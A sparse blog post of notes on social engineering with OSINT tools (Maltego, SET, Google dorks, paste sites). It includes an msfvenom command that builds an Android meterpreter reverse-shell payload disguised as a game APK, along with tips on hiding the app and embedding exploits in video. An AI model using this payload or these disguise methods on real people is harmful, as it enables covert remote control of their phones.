How to do Social Engineering using OSINT

Social Engineering and public recon

There is a script in GitHub, that will do a big Google search on domain and email address.

Maltego

  • Different plugin available, some free some fee
  • Company Stalker – gonna search for email address stuff

SET

  • Update SET first, option 4
  • can embed SET exploit into Video

Android

  • Shell command doesn’t work very well, better to use the inbuilt cmds.
  • Can make persistence and hide the app
  • msfvenom -p android/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx EXITFUNC=thread > /root/game.apk

XSS

  • Reflected – most common

 

 

 

Search Enging searching

Baidu.com – China

Yandex.ru – Russia

 

 

Bing.com – maybe the only reason to use Bing!

 

 

 

Google

 

 

Google operators

 

Google Dorks

 

Searching for people

Paste sites

Wikipedia

TOR

 

Social Media

 

Facebook

 

 

Maltego

 

 

 

 

 

SET

 

 

Metasploit

 

XSS

 

 

 

 

 

 

 

 

 

 

Defence

 

 

 

 

 

 

More Info on Soc Eng

 

 

 

 

 

Little and often staff training

 

 

 

 

And yet more notes

 

 

 

 

 

 

 

 

 

 

 

 

Summary
Article Name
How to do Social Engineering using OSINT
Description
How to do Social Engineering using OSINT, Google Hacking and more
Author
Publisher Name
OIC Solutions

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this:
search previous next tag category expand menu location phone mail time cart zoom edit close